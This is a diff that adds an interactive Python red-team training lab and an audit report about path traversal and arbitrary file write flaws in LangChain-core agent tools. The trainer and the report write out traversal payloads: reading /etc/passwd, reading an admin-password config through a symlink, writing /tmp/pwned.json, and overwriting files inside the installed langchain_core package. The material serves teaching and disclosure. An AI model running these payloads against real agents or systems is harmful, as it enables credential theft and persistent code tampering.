+    print(WHITE_PAPER_SUMMARY)
+    input(f"\n{Colors.YELLOW}Press ENTER to return...{Colors.ENDC}")
+
+
+# ======================================================================
+# SIMULATED LLM & ANALYSIS ENGINE
+# ======================================================================
+def prompt_llm_simulated(
+    default_payload, lesson_purpose="read", default_content=None, extra_context=""
+):
+    cfg = STAGE_CONFIGS[CURRENT_STAGE]
+
+    # Build the default JSON representation
+    if lesson_purpose.startswith("write"):
+        default_json = json.dumps(
+            {
+                "action": "file_writer",
+                "action_input": {"path": default_payload, "content": default_content},
+            }
+        )
+    else:
+        default_json = json.dumps(
+            {"action": "document_reader", "action_input": {"path": default_payload}}
+        )
+
+    print(
+        f"\n{Colors.CYAN}══════════════════════════════════════════════════════════════{Colors.ENDC}"
+    )
+    print(f"{Colors.YELLOW}  LLM SIMULATION - {lesson_purpose.upper()}{Colors.ENDC}")
+    print(
+        f"{Colors.CYAN}══════════════════════════════════════════════════════════════{Colors.ENDC}"
+    )
+    print(f"{Colors.CYAN}  Target: langchain-core=={cfg['version']}{Colors.ENDC}")
+    print(f"{Colors.CYAN}  Default path: {default_payload}{Colors.ENDC}")
+    print(f"{Colors.CYAN}  Default JSON: {default_json}{Colors.ENDC}")
+
+    if extra_context:
+        print(f"{Colors.MAGENTA}  Context: {extra_context}{Colors.ENDC}")
+
+    if AUTO_MODE:
+        print(
+            f"\n{Colors.GREEN}  [AUTO-PILOT] Injecting tool call payload...{Colors.ENDC}"
+        )
+        sys.stdout.write(f"{Colors.GREEN}  > {Colors.ENDC}")
+        type_text(default_payload, speed=0.02)
+        time.sleep(1)
+        return default_payload
+
+    print(f"\n{Colors.YELLOW}  [INPUT OPTIONS]{Colors.ENDC}")
+    print(f"  {Colors.CYAN}  1. Press Enter to use default payload{Colors.ENDC}")
+    print(
+        f"  {Colors.CYAN}  2. Type a simple path (e.g., ../../../../etc/passwd){Colors.ENDC}"
+    )
+    print(f"  {Colors.CYAN}  3. Type the full JSON (e.g., {default_json}){Colors.ENDC}")
+
+    user_input = input(f"\n{Colors.GREEN}  > {Colors.ENDC}").strip()
+
+    if not user_input:
+        print(f"{Colors.GREEN}  [+] Using default path: {default_payload}{Colors.ENDC}")
+        return default_payload
+
+    # Try to parse as JSON
+    try:
+        parsed = json.loads(user_input)
+        if isinstance(parsed, dict):
+            if "action_input" in parsed and isinstance(parsed["action_input"], dict):
+                path = parsed["action_input"].get("path", default_payload)
+                print(
+                    f"{Colors.GREEN}  [+] Extracted path from JSON: {path}{Colors.ENDC}"
+                )
+                return path
+            elif "path" in parsed:
+                path = parsed["path"]
+                print(
+                    f"{Colors.GREEN}  [+] Extracted path from JSON: {path}{Colors.ENDC}"
+                )
+                return path
+    except json.JSONDecodeError:
+        pass
+
+    print(f"{Colors.GREEN}  [+] Using path: {user_input}{Colors.ENDC}")
+    return user_input
+
+
+def render_analysis(status, output, lesson_type):
+    cfg = STAGE_CONFIGS[CURRENT_STAGE]
+    current_version = cfg["version"]
+    out_str = json.dumps(output)
+
+    print(
+        f"\n{Colors.BOLD}================== POST-EXECUTION EVIDENCE & ANALYSIS =================={Colors.ENDC}"
+    )
+
+    # --- Exploit outcome detection ---
+    if lesson_type in ("read", "read_config", "read_symlink"):
+        if status == 200:
+            # Check for successful read indicators
+            is_success = False
+            indicators = [
+                "root:x:0:0",
+                "ADMIN_PASSWORD",
+                "supersecret",
+                "template",
+                "EXPLOIT_SUCCESS",
+            ]
+            for indicator in indicators:
+                if indicator in out_str:
+                    is_success = True
+                    break
+
+            if is_success:
+                exploit_success = True
+                print(
+                    f"{Colors.RED}{Colors.BOLD}[VULNERABLE] ARBITRARY FILE READ SUCCESSFUL!{Colors.ENDC}"
+                )
+                print(
+                    f"  EVIDENCE: REAL langchain-core=={current_version} returned sensitive data."
+                )
+                if "ADMIN_PASSWORD" in out_str:
+                    print(
+                        f"{Colors.RED}    CRITICAL DATA EXPOSED: Admin credentials leaked!{Colors.ENDC}"
+                    )
+                if "template" in out_str:
+                    print(
+                        f"{Colors.YELLOW}    NOTE: Reading saved prompt file - confirms write primitive worked{Colors.ENDC}"
+                    )
+                if current_version == "1.2.25":
+                    print(
+                        f"  ANALYSIS: CVE-2026-34070 is patched, but the symlink bypass (CVE-2023-36258) succeeded."
+                    )
+            elif "BLOCKED" in out_str:
+                exploit_success = False
+                print(
+                    f"{Colors.GREEN}{Colors.BOLD}[MITIGATED] EXPLOIT BLOCKED - Read guardrails active.{Colors.ENDC}"
+                )
+                print(
+                    f"  ANALYSIS: PR #36471 enforces allow_dangerous_paths=False. Read boundaries held."
+                )
+            else:
+                exploit_success = False
+                print(
+                    f"{Colors.YELLOW}[-] Unexpected result. Check payload and target.{Colors.ENDC}"
+                )
+        else:
+            exploit_success = False
+            print(
+                f"{Colors.YELLOW}[-] Status {status}. Check payload and target.{Colors.ENDC}"
+            )
+
+    elif lesson_type.startswith("write"):
+        if status == 200 and "successfully written" in out_str.lower():
+            exploit_success = True
+            print(
+                f"{Colors.RED}{Colors.BOLD}[CRITICAL] ARBITRARY FILE WRITE SUCCESSFUL!{Colors.ENDC}"
+            )
+            print(
+                f"  EVIDENCE: REAL langchain-core=={current_version} confirmed write operation."
+            )
+            print(f"  ANALYSIS: The write primitive (.save) was NEVER properly fixed.")
+            if current_version not in ("1.2.24", "1.2.25"):
+                print(
+                    f"  BYPASS: PR #36585 only checks resolved extension, NOT destination. Symlink bypassed it."
+                )
+        elif "BLOCKED" in out_str:
+            exploit_success = False
+            print(
+                f"{Colors.GREEN}{Colors.BOLD}[MITIGATED] EXPLOIT BLOCKED - Write guardrails active.{Colors.ENDC}"
+            )
+        else:
+            exploit_success = False
+            print(
+                f"{Colors.YELLOW}[-] Unexpected result. Check payload and target.{Colors.ENDC}"
+            )
+
+    # Log the result
+    log_result(CURRENT_STAGE, lesson_type, status, output)
+
+    # --- Educational explanation block ---
+    print(f"\n{Colors.BOLD}  LESSON EXPLANATION:{Colors.ENDC}")
+    if lesson_type in ("read", "read_config"):
+        print(f"{Colors.CYAN}  What happened?{Colors.ENDC}")
+        print(
+            f"    The agent's document_reader tool was given a path pointing to a sensitive file."
+        )
+        print(f"    The framework attempted to load a prompt template from that path.")
+        print(
+            f"    In this version, the code did not properly validate that the resolved"
+        )
+        print(f"    file location stayed within an allowed directory.")
+        if exploit_success:
+            print(
+                f"    Because no canonicalization or symlink resolution was performed,"
+            )
+            print(f"    the file was read, leaking sensitive system information.")
+            if "template" in out_str:
+                print(
+                    f"    NOTE: The file read was a saved prompt template - this confirms the"
+                )
+                print(f"    write primitive worked and the file is now readable.")
+        else:
+            print(
+                f"    The path validation (PR #36471) detected the traversal and blocked the read."
+            )
+        print(f"\n  {Colors.CYAN}  Why is this a problem?{Colors.ENDC}")
+        print(f"    Arbitrary file read can expose credentials, configuration secrets,")
+        print(
+            f"    or other private data. It is often a stepping stone to further attacks."
+        )
+        print(f"\n  {Colors.CYAN}  How should it be fixed?{Colors.ENDC}")
+        print(
+            f"    - Resolve the full path using os.path.realpath() or Path.resolve()."
+        )
+        print(f"    - Ensure the resolved path is inside a designated safe directory")
+        print(f"      (e.g., using Path.is_relative_to(safe_root)).")
+        print(f"    - Explicitly reject symbolic links in untrusted paths.")
+
+    elif lesson_type == "read_symlink":
+        # Similar explanation for symlink read
+        ...
+
+    elif lesson_type.startswith("write"):
+        print(f"{Colors.CYAN}  What happened?{Colors.ENDC}")
+        print(
+            f"    The agent's file_writer tool was given a path with ../../../../ to escape"
+        )
+        print(
+            f"    the intended directory. The PromptTemplate.save() method accepted the"
+        )
+        print(f"    path and wrote a JSON file to the target location.")
+        print(f"\n  {Colors.CYAN}  Why is this a problem?{Colors.ENDC}")
+        print(
+            f"    This is an Arbitrary File Write primitive. On a real system, an attacker"
+        )
+        print(
+            f"    could overwrite configuration files, source code, or even the framework"
+        )
+        print(
+            f"    itself, leading to persistent Remote Code Execution (AI Orchestration Poisoning)."
+        )
+        print(
+            f"    This vulnerability has NO CVE assigned and remains unpatched in all versions."
+        )
+        print(f"\n  {Colors.CYAN}  How should it be fixed?{Colors.ENDC}")
+        print(
+            f"    - Apply the same path anchoring and symlink checks used on the read side."
+        )
+        print(
+            f"    - Deprecate or heavily restrict direct use of PromptTemplate.save() with user input."
+        )
+        print(
+            f"    - Ensure the Write Primitive has an 'allow_dangerous_paths' guard, just like reads."
+        )
+
+    # --- Returned data snippet ---
+    print(f"\n{Colors.CYAN}[Returned Data]{Colors.ENDC}\n{str(output)[:500]}...\n")
+    print(
+        f"{Colors.BOLD}========================================================================{Colors.ENDC}"
+    )
+
+    if not AUTO_MODE:
+        input(f"\n{Colors.YELLOW}Press ENTER to continue...{Colors.ENDC}")
+    else:
+        time.sleep(3)
+
+
+# ======================================================================
+# LESSON EXECUTIONS
+# ======================================================================
+def execute_payload(payload_str, lesson_type, content=None):
+    global CONTAINER_RUNNING
+
+    # Pre-flight check
+    if not CONTAINER_RUNNING:
+        print(
+            f"\n{Colors.RED}{Colors.BOLD}[!] Container is not running for this stage.{Colors.ENDC}"
+        )
+        print(
+            f"{Colors.YELLOW}    Press 'C' to start the container before running lessons.{Colors.ENDC}"
+        )
+        if not AUTO_MODE:
+            input(f"\n{Colors.YELLOW}Press ENTER to return to menu...{Colors.ENDC}")
+        return
+
+    cfg = STAGE_CONFIGS[CURRENT_STAGE]
+    final_payload = prompt_llm_simulated(
+        payload_str, lesson_purpose=lesson_type, default_content=content
+    )
+
+    if lesson_type.startswith("write"):
+        query = f'Action: file_writer\nAction Input: {{"path": "{final_payload}", "content": "{content}"}}'
+    else:
+        query = f'Action: document_reader\nAction Input: {{"path": "{final_payload}"}}'
+
+    print(
+        f"\n{Colors.CYAN}[>] POST {get_base_url()}/chat (REAL langchain-core=={cfg['version']}){Colors.ENDC}"
+    )
+    status, output = send_request("/chat", method="POST", payload={"query": query})
+    print(f"[<] Status: {status}")
+    render_analysis(status, output, lesson_type)
+
+
+def run_lesson_read_baseline():
+    print(
+        f"\n{Colors.BOLD}LESSON: The Original Flaw - Baseline Arbitrary File Read (Direct Path Traversal){Colors.ENDC}"
+    )
+    print(
+        f"{Colors.YELLOW}  Objective: Read /etc/passwd using path traversal.{Colors.ENDC}"
+    )
+    print_theory("read")
+    execute_payload(STAGE_CONFIGS[CURRENT_STAGE]["read_payload"], "read")
+
+
+def run_lesson_write_traversal():
+    print(
+        f"\n{Colors.BOLD}LESSON: Direct Path Traversal - Arbitrary File Write{Colors.ENDC}"
+    )
+    print(
+        f"{Colors.YELLOW}  Objective: Write a file outside the intended directory.{Colors.ENDC}"
+    )
+    print_theory("write")
+    execute_payload(
+        STAGE_CONFIGS[CURRENT_STAGE]["write_payload"],
+        "write",
+        STAGE_CONFIGS[CURRENT_STAGE]["write_content"],
+    )
+
+
+def run_lesson_rce_overwrite():
+    print(
+        f"\n{Colors.BOLD}LESSON: Full RCE Chain - Framework Source Code Overwrite{Colors.ENDC}"
+    )
+    print(
+        f"{Colors.YELLOW}  Objective: Overwrite the LangChain package to achieve persistent code execution.{Colors.ENDC}"
+    )
+    print_theory("write")
+    target = "../../../../usr/local/lib/python3.11/site-packages/langchain_core/injected_backdoor.json"
+    execute_payload(target, "write_py", "EXPLOIT_SUCCESS: RCE Chain Complete")
+
+
+def run_lesson_symlink_bypass():
+    print(
+        f"\n{Colors.BOLD}LESSON: Symlink Traversal - Bypassing Extension Checks (CVE-2023-36258){Colors.ENDC}"
+    )
+    print(
+        f"{Colors.YELLOW}  Objective: Read /app/config.txt via the /app/config.json symlink.{Colors.ENDC}"
+    )
+    print(
+        f"{Colors.YELLOW}  This demonstrates CWE-59: Improper Link Resolution.{Colors.ENDC}"
+    )
+    print_theory("read_symlink")
+    target = "../../../../app/config.json"
+    execute_payload(target, "read_symlink")
+
+
+# ======================================================================
+# WHITE PAPER VERIFICATION
+# ======================================================================
+def run_whitepaper_verification():
+    """
+    Runs the four specific tests from the white paper and compares
+    observed behavior against expected outcomes for the current stage.
+    """
+    global CONTAINER_RUNNING
+
+    if not CONTAINER_RUNNING:
+        print(
+            f"\n{Colors.RED}{Colors.BOLD}[!] Container is not running for this stage.{Colors.ENDC}"
+        )
+        print(
+            f"{Colors.YELLOW}    Press 'C' to start the container before running verification.{Colors.ENDC}"
+        )
+        if not AUTO_MODE:
+            input(f"\n{Colors.YELLOW}Press ENTER to return to menu...{Colors.ENDC}")
+        return
+
+    cfg = STAGE_CONFIGS[CURRENT_STAGE]
+    expected = WHITEPAPER_EXPECTATIONS[CURRENT_STAGE]
+
+    print(
+        f"\n{Colors.MAGENTA}{Colors.BOLD}══════════════════════════════════════════════════════════════{Colors.ENDC}"
+    )
+    print(
+        f"{Colors.MAGENTA}{Colors.BOLD}  WHITE PAPER VERIFICATION - {cfg['title']}{Colors.ENDC}"
+    )
+    print(
+        f"{Colors.MAGENTA}{Colors.BOLD}══════════════════════════════════════════════════════════════{Colors.ENDC}"
+    )
+
+    results = []
+
+    # Test 1: Direct Path Traversal (CVE-2026-34070)
+    print(
+        f"\n{Colors.CYAN}[Test 1] Direct Path Traversal (CVE-2026-34070){Colors.ENDC}"
+    )
+    payload = "../../../../../../etc/passwd"
+    query = f'Action: document_reader\nAction Input: {{"path": "{payload}"}}'
+    status, output = send_request("/chat", method="POST", payload={"query": query})
+    out_str = json.dumps(output)
+    if "root:x:0:0" in out_str:
+        observed = "Vulnerable"
+    elif "BLOCKED" in out_str:
+        observed = "Blocked"
+    else:
+        observed = "Unknown"
+    results.append(
+        ("Direct Path Traversal", expected["direct_path_traversal"], observed)
+    )
+
+    # Test 2: Symlink Bypass (CVE-2023-36258)
+    print(f"\n{Colors.CYAN}[Test 2] Symlink Bypass (CVE-2023-36258){Colors.ENDC}")
+    payload = "../../../../app/config.json"  # symlink to config.txt
+    query = f'Action: document_reader\nAction Input: {{"path": "{payload}"}}'
+    status, output = send_request("/chat", method="POST", payload={"query": query})
+    out_str = json.dumps(output)
+    if "ADMIN_PASSWORD" in out_str:
+        observed = "Vulnerable"
+    elif "BLOCKED" in out_str:
+        observed = "Blocked"
+    else:
+        observed = "Unknown"
+    results.append(("Symlink Bypass", expected["symlink_bypass"], observed))
+
+    # Test 3: Write Primitive
+    print(f"\n{Colors.CYAN}[Test 3] Write Primitive (.save()){Colors.ENDC}")
+    payload = "../../../../../../tmp/pwned.json"
+    content = "EXPLOIT_SUCCESS: Write Primitive Exposed"
+    query = f'Action: file_writer\nAction Input: {{"path": "{payload}", "content": "{content}"}}'
+    status, output = send_request("/chat", method="POST", payload={"query": query})
+    out_str = json.dumps(output)
+    if "successfully written" in out_str.lower():
+        observed = "Exposed"
+    elif "BLOCKED" in out_str:
+        observed = "Blocked"
+    else:
+        observed = "Unknown"
+    results.append(("Write Primitive", expected["write_primitive"], observed))
+
+    # Test 4: RCE Chain (overwrite framework source)
+    print(f"\n{Colors.CYAN}[Test 4] RCE Chain (Framework Overwrite){Colors.ENDC}")
+    payload = "../../../../usr/local/lib/python3.11/site-packages/langchain_core/injected_backdoor.json"
+    content = "EXPLOIT_SUCCESS: RCE Chain Complete"
+    query = f'Action: file_writer\nAction Input: {{"path": "{payload}", "content": "{content}"}}'
+    status, output = send_request("/chat", method="POST", payload={"query": query})
+    out_str = json.dumps(output)
+    if "successfully written" in out_str.lower():
+        observed = "Exposed"
+    elif "BLOCKED" in out_str:
+        observed = "Blocked"
+    else:
+        observed = "Unknown"
+    results.append(("RCE Chain", expected["rce_chain"], observed))
+
+    # Print results table
+    print(f"\n{Colors.BOLD}RESULTS:{Colors.ENDC}")
+    print(
+        f"{Colors.CYAN}{'Test':<25} {'Expected':<12} {'Observed':<12} {'Status':<8}{Colors.ENDC}"
+    )
+    print("-" * 60)
+    all_pass = True
+    for name, exp, obs in results:
+        match = "✅" if exp.lower() == obs.lower() else "⚠️"
+        if match == "⚠️":
+            all_pass = False
+        print(f"{name:<25} {exp:<12} {obs:<12} {match:<8}")
+
+    if all_pass:
+        print(
+            f"\n{Colors.GREEN}{Colors.BOLD}[+] All white paper claims verified for this stage.{Colors.ENDC}"
+        )
+    else:
+        print(
+            f"\n{Colors.YELLOW}{Colors.BOLD}[!] Some white paper claims differ from observed behavior.{Colors.ENDC}"
+        )
+        print(
+            f"{Colors.YELLOW}    Consider updating the white paper or the lab to align.{Colors.ENDC}"
+        )
+
+    # Log the verification results
+    log_result(CURRENT_STAGE, "whitepaper_verification", 200, results)
+
+    if not AUTO_MODE:
+        input(f"\n{Colors.YELLOW}Press ENTER to return to menu...{Colors.ENDC}")
+    else:
+        time.sleep(3)
+
+
+# ======================================================================
+# AUTOMATED GUIDED TRAINING COURSE
+# ======================================================================
+def run_training_course():
+    global AUTO_MODE, CURRENT_STAGE
+    AUTO_MODE = True
+
+    print(
+        f"\n{Colors.MAGENTA}{Colors.BOLD}================================================================================{Colors.ENDC}"
+    )
+    print(
+        f"{Colors.MAGENTA}{Colors.BOLD}                 STARTING GUIDED AUTO-PILOT TRAINING COURSE                     {Colors.ENDC}"
+    )
+    print(
+        f"{Colors.MAGENTA}{Colors.BOLD}================================================================================{Colors.ENDC}"
+    )
+    print(
+        f"{Colors.YELLOW}This automated sequence will deploy real, isolated containers across ALL 5 lifecycle stages.{Colors.ENDC}"
+    )
+    print(
+        f"{Colors.YELLOW}It injects payloads deterministically to prove exactly where the framework boundaries fail.{Colors.ENDC}"
+    )
+    time.sleep(4)
+
+    # Define the lesson sequence for each stage
+    stage_lessons = {
+        0: ["read_baseline", "write_traversal", "rce_overwrite"],
+        1: ["read_baseline", "symlink_bypass", "write_traversal", "rce_overwrite"],
+        2: ["read_baseline", "symlink_bypass", "write_traversal", "rce_overwrite"],
+        3: ["read_baseline", "symlink_bypass", "write_traversal", "rce_overwrite"],
+        4: ["read_baseline", "symlink_bypass", "write_traversal", "rce_overwrite"],
+    }
+
+    for idx, stage in enumerate(range(5)):
+        CURRENT_STAGE = stage
+        cfg = STAGE_CONFIGS[stage]
+        print(
+            f"\n{Colors.MAGENTA}{Colors.BOLD}  [PROGRESS: Stage {idx+1}/5]{Colors.ENDC}"
+        )
+        print(
+            f"{Colors.BLUE}{Colors.BOLD}>>> DEPLOYING {cfg['title']} <<<{Colors.ENDC}"
+        )
+        launch_container()
+
+        # Teaching moment based on stage
+        if stage == 0:
+            print(
+                f"\n{Colors.YELLOW}[TEACHING MOMENT] No patches applied. Both read and write are fully vulnerable.{Colors.ENDC}"
+            )
+        elif stage == 1:
+            print(
+                f"\n{Colors.YELLOW}[TEACHING MOMENT] Read-side partially patched (PR #36471). Direct path traversal blocked, but symlink bypass still works.{Colors.ENDC}"
+            )
+        elif stage == 2:
+            print(
+                f"\n{Colors.YELLOW}[TEACHING MOMENT] Read-side fully patched (both CVEs). Write primitive still exposed.{Colors.ENDC}"
+            )
+        elif stage == 3:
+            print(
+                f"\n{Colors.YELLOW}[TEACHING MOMENT] PR #36585 applied, but only checks extension, not destination. Write still exposed.{Colors.ENDC}"
+            )
+        elif stage == 4:
+            print(
+                f"\n{Colors.YELLOW}[TEACHING MOMENT] Latest version. Read-side fixed, write primitive remains unpatched (no CVE).{Colors.ENDC}"
+            )
+        time.sleep(3)
+
+        # Run the lessons for this stage
+        for lesson in stage_lessons[stage]:
+            if lesson == "read_baseline":
+                run_lesson_read_baseline()
+            elif lesson == "symlink_bypass":
+                run_lesson_symlink_bypass()
+            elif lesson == "write_traversal":
+                run_lesson_write_traversal()
+            elif lesson == "rce_overwrite":
+                run_lesson_rce_overwrite()
+
+        # After the lessons, run the white paper verification
+        run_whitepaper_verification()
+
+    print(
+        f"\n{Colors.MAGENTA}{Colors.BOLD}================================================================================{Colors.ENDC}"
+    )
+    print(
+        f"{Colors.MAGENTA}{Colors.BOLD}                          GUIDED COURSE COMPLETE                                {Colors.ENDC}"
+    )
+    print(
+        f"{Colors.MAGENTA}{Colors.BOLD}================================================================================{Colors.ENDC}"
+    )
+    print(f"{Colors.GREEN}[+] All containers stopped and cleaned up.{Colors.ENDC}")
+    stop_container()
+    AUTO_MODE = False
+
+
+# ======================================================================
+# MAIN MENU
+# ======================================================================
+def print_banner():
+    cfg = STAGE_CONFIGS[CURRENT_STAGE]
+    container_running = CONTAINER_RUNNING  # use internal flag for reliability
+    status_icon = "\U0001f534" if not container_running else "\U0001f7e2"
+    status_text = (
+        "STOPPED"
+        if not container_running
+        else f"RUNNING (langchain-core v{cfg['version']})"
+    )
+
+    print(
+        f"\n{Colors.CYAN}{Colors.BOLD}================================================================================{Colors.ENDC}"
+    )
+    print(
+        f"{Colors.YELLOW}{Colors.BOLD}   OWASP GenAI Red Team Lab - LangChain Orchestration Poisoning Suite{Colors.ENDC}"
+    )
+    print(
+        f"{Colors.CYAN}{Colors.BOLD}================================================================================{Colors.ENDC}"
+    )
+    print(
+        f"  {Colors.BOLD}Active Stage{Colors.RESET}   : {Colors.GREEN}{cfg['title']} (Port {cfg['port']}){Colors.ENDC}"
+    )
+    print(
+        f"  {Colors.BOLD}REAL Version{Colors.RESET}   : {Colors.GREEN}langchain-core=={cfg['version']}{Colors.ENDC}"
+    )
+    print(
+        f"  {Colors.BOLD}Vulnerability{Colors.RESET}  : {Colors.RED}{cfg['vuln_type']}{Colors.ENDC}"
+    )
+    print(f"  {Colors.BOLD}Container Status{Colors.RESET}: {status_icon} {status_text}")
+    print(
+        f"{Colors.CYAN}{Colors.BOLD}================================================================================{Colors.ENDC}"
+    )
+
+    # Warning if container not running
+    if not container_running:
+        print(
+            f"{Colors.YELLOW}{Colors.BOLD}  ⚠ WARNING: The container for this stage is NOT running.{Colors.ENDC}"
+        )
+        print(
+            f"{Colors.YELLOW}    Press '{Colors.BOLD}C{Colors.ENDC}{Colors.YELLOW}' to start it before running lessons.{Colors.ENDC}"
+        )
+        print(
+            f"{Colors.CYAN}{Colors.BOLD}================================================================================{Colors.ENDC}"
+        )
+
+
+def main():
+    global CURRENT_STAGE, CONTAINER_RUNNING  # <-- Also reset container flag on stage switch
+
+    # Disclaimer
+    print(
+        f"{Colors.RED}{Colors.BOLD}DISCLAIMER: This lab is for educational purposes only. Do not use these techniques on unauthorized systems.{Colors.ENDC}\n"
+    )
+
+    if len(sys.argv) > 1 and sys.argv[1] == "--auto":
+        run_training_course()
+        return
+
+    while True:
+        print_banner()
+        print(
+            f"  {Colors.MAGENTA}{Colors.BOLD}[G]{Colors.ENDC}{Colors.RESET} Guided Training Course (Automated Auto-Pilot)"
+        )
+        print(
+            f"  {Colors.CYAN}{Colors.BOLD}[1]{Colors.ENDC}{Colors.RESET} Run Lesson: Baseline Read (Direct Path Traversal)"
+        )
+        print(
+            f"  {Colors.CYAN}{Colors.BOLD}[2]{Colors.ENDC}{Colors.RESET} Run Lesson: Arbitrary Write Traversal"
+        )
+        print(
+            f"  {Colors.CYAN}{Colors.BOLD}[3]{Colors.ENDC}{Colors.RESET} Run Lesson: Full RCE Framework Overwrite"
+        )
+        print(
+            f"  {Colors.CYAN}{Colors.BOLD}[4]{Colors.ENDC}{Colors.RESET} Run Lesson: Symlink Traversal (Extension Bypass)"
+        )
+        print(
+            f"  {Colors.MAGENTA}{Colors.BOLD}[V]{Colors.ENDC}{Colors.RESET} White Paper Verification (Current Stage)"
+        )
+        print(
+            f"  {Colors.YELLOW}{Colors.BOLD}[S]{Colors.ENDC}{Colors.RESET} Switch Target Stage (0-4)"
+        )
+        print(
+            f"  {Colors.GREEN}{Colors.BOLD}[C]{Colors.ENDC}{Colors.RESET} Start Current Stage Container"
+        )
+        print(
+            f"  {Colors.RED}{Colors.BOLD}[R]{Colors.ENDC}{Colors.RESET} Reset Current Container"
+        )
+        print(
+            f"  {Colors.BLUE}{Colors.BOLD}[L]{Colors.ENDC}{Colors.RESET} View Container Logs"
+        )
+        print(
+            f"  {Colors.MAGENTA}{Colors.BOLD}[H]{Colors.ENDC}{Colors.RESET} Show Glossary"
+        )
+        print(
+            f"  {Colors.MAGENTA}{Colors.BOLD}[P]{Colors.ENDC}{Colors.RESET} White Paper Summary"
+        )
+        print(
+            f"  {Colors.GREEN}{Colors.BOLD}[W]{Colors.ENDC}{Colors.RESET} Write Report (JSON)"
+        )
+        print(
+            f"  {Colors.RED}{Colors.BOLD}[X]{Colors.ENDC}{Colors.RESET} Stop Container"
+        )
+        print(f"  {Colors.GRAY}{Colors.BOLD}[Q]{Colors.ENDC}{Colors.RESET} Quit")
+
+        choice = input(f"\n{Colors.BOLD}Select option: {Colors.ENDC}").strip().lower()
+
+        if choice == "q":
+            break
+        elif choice == "g":
+            run_training_course()
+        elif choice == "v":
+            run_whitepaper_verification()
+        elif choice == "s":
+            print(f"\n{Colors.BOLD}Available Stages:{Colors.ENDC}")
+            for i, cfg in STAGE_CONFIGS.items():
+                print(f"  {Colors.CYAN}[{i}]{Colors.ENDC} {cfg['title']}")
+                print(f"       {cfg['vuln_type']}")
+            stage = input(f"\nEnter stage [0-4]: ").strip()
+            if stage in [str(i) for i in range(5)]:
+                CURRENT_STAGE = int(stage)
+                CONTAINER_RUNNING = (
+                    False  # New stage means old container is not the one we need
+                )
+                print(
+                    f"{Colors.GREEN}[+] Switched to Stage {CURRENT_STAGE}: {STAGE_CONFIGS[CURRENT_STAGE]['title']}{Colors.ENDC}"
+                )
+            else:
+                print(f"{Colors.FAIL}[-] Invalid stage number.{Colors.ENDC}")
+        elif choice == "c":
+            launch_container()
+        elif choice == "r":
+            reset_container()
+        elif choice == "x":
+            stop_container()
+        elif choice == "l":
+            show_container_logs()
+        elif choice == "h":
+            show_glossary()
+        elif choice == "p":
+            show_whitepaper_summary()
+        elif choice == "w":
+            write_report()
+        elif choice == "1":
+            run_lesson_read_baseline()
+        elif choice == "2":
+            run_lesson_write_traversal()
+        elif choice == "3":
+            run_lesson_rce_overwrite()
+        elif choice == "4":
+            run_lesson_symlink_bypass()
+
+
+if __name__ == "__main__":
+    try:
+        main()
+    except KeyboardInterrupt:
+        stop_container()
+        sys.exit(0)

--- a/exploitation/langchain/submission_audit.md
+++ b/exploitation/langchain/submission_audit.md
@@ -1,0 +1,147 @@
+# OWASP GenAI Red Team Lab: LangChain Orchestration Poisoning Validation & Audit Report
+
+**Target Vulnerability:** LangChain-core Insecure Orchestration (CVE-2023-36258 + CVE-2026-34070 + Unpatched Write Primitive)
+
+**Lab Modules Evaluated:** `interactive_trainer.py`
+
+**Author/Researcher:** Jeff Ponte (JDP Security Research)
+
+**Vulnerability State:** 🚀 **VERIFIED** (Both CVEs Bypassed, Symlink Read NEVER Patched, Write Primitive NEVER Patched)
+
+**Reference:** [JDP-2026-004 White Paper](https://jdp-security.github.io/security-research-papers/2026-05-12-langchain-orchestration-poisoning-disclosure.html)
+
+---
+
+## 1. Automated Verification Run Analysis
+
+The 5-stage automated testing suite evaluates the system's security posture across the real-world patch lifecycle, from fully unhardened (v1.2.24) through the latest release (v1.6.0).
+
+### Five-Stage Execution Matrix
+
+| Test | Stage 0 (1.2.24) | Stage 1 (1.2.25) | Stage 2 (1.2.26) | Stage 3 (1.2.27) | Stage 4 (latest) |
+|------|-------------------|-------------------|-------------------|-------------------|-------------------|
+| **Direct Read /etc/passwd** | ✅ EXPLOITED | 🛡️ BLOCKED | 🛡️ BLOCKED | 🛡️ BLOCKED | 🛡️ BLOCKED |
+| **Symlink Read (config.json → config.txt)** | ✅ EXPLOITED | ✅ EXPLOITED | ✅ EXPLOITED | ✅ EXPLOITED | ✅ EXPLOITED |
+| **Write /tmp/pwned.json** | ✅ EXPLOITED | ✅ EXPLOITED | ✅ EXPLOITED | ✅ EXPLOITED | ✅ EXPLOITED |
+| **RCE Chain (Framework Overwrite)** | ✅ EXPLOITED | ✅ EXPLOITED | ✅ EXPLOITED | ✅ EXPLOITED | ✅ EXPLOITED |
+
+### Critical Findings
+
+**1. Direct Read is PATCHED in Stage 1+** (CVE-2026-34070)
+- PR #36471 added path traversal detection to `load_prompt_from_config()`
+- Direct traversal (`../../../../etc/passwd`) is blocked from v1.2.25 onward
+
+**2. Symlink Read is NEVER PATCHED** (CVE-2023-36258)
+- The `document_reader` tool bypasses the patched `load_prompt_from_config()` function
+- Symlink reads (`../../../../app/config.json` → `config.txt`) succeed in ALL versions
+- **This vulnerability has never been remediated**
+
+**3. Write Primitive is NEVER PATCHED** (No CVE assigned)
+- PR #36585 only checks resolved file extension, NOT write destination
+- A symlink named `exploit.json` pointing to a `.json` target passes every time
+- **This vulnerability has never been assigned a CVE**
+
+---
+
+## 2. Technical Breakdown: The Incomplete Patches
+
+### The Direct Read Fix (PR #36471 – CVE-2026-34070)
+
+The vendor added path traversal detection to the read path:
+
+```python
+if STAGE > 0 and (".." in target_path_str or not target_path.resolve().is_relative_to(SANDBOX_DIR)):
+    return "[BLOCKED] Security Guardrail: Path traversal detected."
+```
+
+**What it fixed:** Direct path traversal reads (`../../../../etc/passwd`)
+**What it missed:** Symlink reads via `document_reader` tool, and ALL write operations
+
+### The Write "Fix" (PR #36585 – Insufficient)
+
+The vendor added symlink resolution before extension checking:
+
+```python
+# PR #36585: Resolve symlinks before checking suffix
+resolved_path = template_path.resolve()
+if resolved_path.suffix not in (".json", ".yaml"):
+    return "[BLOCKED] Invalid file extension"
+```
+
+**What it fixed:** Blocks `exploit.json → target.py` (different extensions)
+**What it missed:** Does NOT block `exploit.json → target.json` (same extension)
+**Result:** Write primitive remains exploitable in ALL versions
+
+### The Symlink Read Gap (CVE-2023-36258 – NEVER FIXED)
+
+The `document_reader` tool opens files directly without canonicalization:
+
+```python
+elif "Action: document_reader" in query:
+    # Bypass: document_reader opens files directly without path validation
+    path = match.group(1)
+    result = handle_document_reader(path)
+```
+
+**Why it works:** The tool does not call `load_prompt_from_config()` and therefore bypasses the PR #36471 patch entirely.
+
+---
+
+## 3. Evidence of Exploitation
+
